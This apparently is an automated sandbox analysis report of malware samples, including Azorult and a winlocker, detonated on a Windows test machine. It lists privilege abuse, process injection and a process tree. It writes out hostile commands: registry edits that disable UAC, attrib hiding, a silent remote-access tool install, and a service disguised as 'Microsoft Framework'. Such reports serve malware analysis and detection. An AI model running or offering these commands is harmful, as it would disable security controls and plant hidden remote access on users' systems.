Token: SeAuditPrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeSystemEnvironmentPrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeChangeNotifyPrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeRemoteShutdownPrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeUndockPrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeSyncAgentPrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeEnableDelegationPrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeManageVolumePrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeImpersonatePrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeCreateGlobalPrivilege	3068	WinlockerVB6Blacksod.exe
Token: SeShutdownPrivilege	4408	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4408	msiexec.exe
Token: SeCreateTokenPrivilege	4408	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4408	msiexec.exe
Token: SeLockMemoryPrivilege	4408	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4408	msiexec.exe
Token: SeMachineAccountPrivilege	4408	msiexec.exe
Token: SeTcbPrivilege	4408	msiexec.exe
Token: SeSecurityPrivilege	4408	msiexec.exe
Token: SeTakeOwnershipPrivilege	4408	msiexec.exe
Token: SeLoadDriverPrivilege	4408	msiexec.exe
Token: SeSystemProfilePrivilege	4408	msiexec.exe
Token: SeSystemtimePrivilege	4408	msiexec.exe
Token: SeProfSingleProcessPrivilege	4408	msiexec.exe
Token: SeIncBasePriorityPrivilege	4408	msiexec.exe
Token: SeCreatePagefilePrivilege	4408	msiexec.exe
Token: SeCreatePermanentPrivilege	4408	msiexec.exe
Token: SeBackupPrivilege	4408	msiexec.exe
Token: SeRestorePrivilege	4408	msiexec.exe
Token: SeShutdownPrivilege	4408	msiexec.exe
Token: SeDebugPrivilege	4408	msiexec.exe
Token: SeAuditPrivilege	4408	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4408	msiexec.exe
Token: SeChangeNotifyPrivilege	4408	msiexec.exe
Token: SeRemoteShutdownPrivilege	4408	msiexec.exe
Token: SeUndockPrivilege	4408	msiexec.exe
Token: SeSyncAgentPrivilege	4408	msiexec.exe
Token: SeEnableDelegationPrivilege	4408	msiexec.exe
Token: SeManageVolumePrivilege	4408	msiexec.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exe

pid	process
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe

Suspicious use of SendNotifyMessage 38 IoCs

Processes:

msedge.exe

pid	process
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe

Suspicious use of SetWindowsHookEx 16 IoCs

Processes:

Azorult.exewini.exewinit.exerutserv.exerutserv.exerutserv.exerutserv.execheat.exeink.exetaskhost.exeP.exeR8.exewinlogon.exetaskhostw.exewinlogon.exeLogonUI.exe

pid	process
696	Azorult.exe
4884	wini.exe
3536	winit.exe
4508	rutserv.exe
64	rutserv.exe
2044	rutserv.exe
3360	rutserv.exe
744	cheat.exe
4432	ink.exe
4308	taskhost.exe
4664	P.exe
1164	R8.exe
1628	winlogon.exe
180	taskhostw.exe
5864	winlogon.exe
5252	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 1704 wrote to memory of 2764	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 2764	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3500	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 4396	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 4396	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3032	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3032	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3032	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3032	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3032	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3032	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3032	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3032	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3032	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3032	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3032	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3032	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3032	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3032	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3032	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3032	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3032	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3032	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3032	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3032	1704	msedge.exe	msedge.exe

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

Processes:

Azorult.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe

Views/modifies file attributes 1 TTPs 6 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

4860 attrib.exe
2812 attrib.exe
1440 attrib.exe
1252 attrib.exe
3164 attrib.exe
6108 attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\.html
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff3ac246f8,0x7fff3ac24708,0x7fff3ac24718
  2⤵
  PID:2764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
  2⤵
  PID:3500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8
  2⤵
  PID:3032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
  2⤵
  PID:5104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
  2⤵
  PID:3340
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
  2⤵
  PID:1988
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:1
  2⤵
  PID:1640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:1
  2⤵
  PID:3996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4108 /prefetch:1
  2⤵
  PID:3812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
  2⤵
  PID:4056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4824 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
  2⤵
  PID:888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:1
  2⤵
  PID:180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
  2⤵
  PID:648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
  2⤵
  PID:2968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3780 /prefetch:1
  2⤵
  PID:5100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3600 /prefetch:8
  2⤵
  PID:3140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1696 /prefetch:1
  2⤵
  PID:3320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6504 /prefetch:8
  2⤵
  PID:1768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6520 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:688
- C:\Users\Admin\Downloads\NoMoreRansom.exe
  "C:\Users\Admin\Downloads\NoMoreRansom.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:4716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3940 /prefetch:1
  2⤵
  PID:1224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5964 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6548 /prefetch:1
  2⤵
  PID:180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6864 /prefetch:8
  2⤵
  PID:1648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6716 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5100
- C:\Users\Admin\Downloads\Azorult.exe
  "C:\Users\Admin\Downloads\Azorult.exe"
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - UAC bypass
  - Blocks application from running via registry modification
  - Drops file in Drivers directory
  - Checks computer location settings
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Modifies WinLogon
  - Hide Artifacts: Hidden Users
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - System policy modification
  PID:696
- - C:\ProgramData\Microsoft\Intel\wini.exe
    C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:4884
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      PID:5000
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
        5⤵
        
        PID:4952
      - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        6⤵
        UAC bypass
        Windows security bypass
        Hide Artifacts: Hidden Users
        Runs .reg file with regedit
        
        PID:4608
      - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        6⤵
        System Location Discovery: System Language Discovery
        Runs .reg file with regedit
        
        PID:1768
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        6⤵
        Delays execution with timeout.exe
        
        PID:4220
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4508
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:64
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2044
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        6⤵
        Views/modifies file attributes
        
        PID:1252
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        6⤵
        Views/modifies file attributes
        
        PID:3164
      - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        6⤵
        Launches sc.exe
        
        PID:4420
      - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        6⤵
        Launches sc.exe
        
        PID:32
      - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        6⤵
        Launches sc.exe
        
        PID:2164
  - - C:\ProgramData\Windows\winit.exe
      "C:\ProgramData\Windows\winit.exe"
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      PID:3536
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
        5⤵
        
        PID:1408
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        6⤵
        Delays execution with timeout.exe
        
        PID:540
- - C:\programdata\install\cheat.exe
    C:\programdata\install\cheat.exe -pnaxui
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:744
  - - C:\ProgramData\Microsoft\Intel\taskhost.exe
      "C:\ProgramData\Microsoft\Intel\taskhost.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4308
    - - C:\programdata\microsoft\intel\P.exe
        
        C:\programdata\microsoft\intel\P.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4664
    - - C:\programdata\microsoft\intel\R8.exe
        
        C:\programdata\microsoft\intel\R8.exe
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        
        PID:1164
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        6⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:3304
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        7⤵
        Checks computer location settings
        Modifies registry class
        
        PID:4660
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        
        PID:5004
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        
        PID:380
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        8⤵
        Delays execution with timeout.exe
        
        PID:4456
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        8⤵
        
        PID:3920
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        8⤵
        Executes dropped EXE
        
        PID:4756
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        
        PID:3788
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        8⤵
        Delays execution with timeout.exe
        
        PID:2888
        
